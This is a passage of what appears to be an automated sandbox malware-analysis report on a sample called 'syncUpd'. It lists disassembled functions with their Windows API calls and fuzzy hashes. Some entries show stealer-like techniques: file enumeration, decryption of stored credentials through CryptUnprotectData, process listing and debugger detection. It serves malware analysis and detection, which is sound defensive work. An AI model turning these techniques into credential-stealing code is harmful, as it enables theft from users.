                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1415058207-0
                                                                                                                                                                                                                                                              • Opcode ID: 7951ecb2c0469ab767370ba59687eaf2907cca6d851c199fd70eeed7a365bc93
                                                                                                                                                                                                                                                              • Instruction ID: 517a22e988304cbde84a9c372d8745fff7d13a0d8ac44d9a9ad1941466e95bf8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7951ecb2c0469ab767370ba59687eaf2907cca6d851c199fd70eeed7a365bc93
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC12DB71D08218AECB59EBA0CCA6FEDB378AF94714F504699B106621D1EF706F88CF51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FD7A7 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,0041DC20,0041D746), ref: 008FD7F5
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC28), ref: 008FD845
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC2C), ref: 008FD85B
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008FDD71
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 008FDD83
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2325840235-0
                                                                                                                                                                                                                                                              • Opcode ID: 1c60eba5c1c612e8b874372a12ebe7f309e66199d256779a4c52d734630b5e89
                                                                                                                                                                                                                                                              • Instruction ID: 7a9a57c12ff8ed29f8dcfbf3c350bb7d5c4fb08e4845a1dd0940ea1cb0b4e9cc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c60eba5c1c612e8b874372a12ebe7f309e66199d256779a4c52d734630b5e89
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF1AF718182189ECB25EBA0DC95BEEB338BF94714F40559AB11A621D1EF707F89CE90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040BF90 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0095DA40), ref: 0040BFE1
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1498829745-0
                                                                                                                                                                                                                                                              • Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                                                              • Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FC1F7 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FC22A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008FC248
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008FC253
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 008FC2E9
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D726), ref: 008FC31A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D727), ref: 008FC32E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D72A), ref: 008FC34F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1498829745-0
                                                                                                                                                                                                                                                              • Opcode ID: bced4611a23089cc8d92494cfdba6022e88a94dece1429bef504adb33600c636
                                                                                                                                                                                                                                                              • Instruction ID: 06f1ac3bd525adef6d74284d3ba2708fe0c47e079ca9dd051ab956cf648fc07e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bced4611a23089cc8d92494cfdba6022e88a94dece1429bef504adb33600c636
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A414C75D0421E9BDB20CFA4DD89BFEB7B8FB48344F1081A9E605A7280DB745A84CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                                                                                                                                              • String ID: >N@
                                                                                                                                                                                                                                                              • API String ID: 80407269-3381801619
                                                                                                                                                                                                                                                              • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                              • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 009047D7 Relevance: 7.6, APIs: 5, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 00904805
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0090481D
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00904831
                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00904886
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00904946
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3090951853-0
                                                                                                                                                                                                                                                              • Opcode ID: b2544f40f224b76a8b2ddf093633d274dfd3fb81cf13fe2008bce11d3b2ea03e
                                                                                                                                                                                                                                                              • Instruction ID: f240ca21d45b1f6971952113458190372b9026fb47e376881ab5f1e4041d395d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2544f40f224b76a8b2ddf093633d274dfd3fb81cf13fe2008bce11d3b2ea03e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D4138B4940218AFCB24EB94DC99BEDB375BB94704F2086D9E119A61D1DB742F84CF50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00417B4E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00418E46
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00418E89
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                                              • Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00907DB5 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 009090AD
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009090C2
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041C690), ref: 009090CD
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 009090E9
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 009090F0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                                              • Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction ID: ff9e1287d351f765a26999e8909231e547e8ed326f7367c56e51b7a7db325047
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB21F078A01204EFC320EF64FC44B543BB4FB8C305F91907AE658872A1E7B466868F9D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406C10 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
                                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3657800372-0
                                                                                                                                                                                                                                                              • Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F6E77 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008F6E84
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F6E8B
                                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008F6EB8
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008F6EDB
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 008F6EE5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2609814428-0
                                                                                                                                                                                                                                                              • Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction ID: 7cae568b4ae2b7f4d7e8d48abadce6b7e0daaf9fe2718c16098a6e5de467d92f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73010075A40708BBDB20DBA4DD45FAE7779EB44B05F104154F705EB2C0DAB0AA118B95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                                                              • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00905F67 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00905F85
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(0041D599,00000128), ref: 00905F99
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(0041D599,00000128), ref: 00905FAE
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00905FC3
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(0041D599), ref: 00905FE1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 420147892-0
                                                                                                                                                                                                                                                              • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction ID: df08cd93163e6aa97acc0019185cd1771151986c398656cc3c3e05ab36018ea6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D012175A10609EFDB20DFA4DD98BEEB7B9BB48300F104589E905D7280DB749B40CF50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00905807 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,008F50A5,40000001,00000000,00000000), ref: 00905827
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 80407269-0
                                                                                                                                                                                                                                                              • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                              • Instruction ID: ca30a4374b7df0b4d993d497785d7739fca569fcf3988f2460d8f1780dddf6a5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311E670604A08AFDB10CFA4D844FA733AAAF89310F11D958FE098B294D675E841DF60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

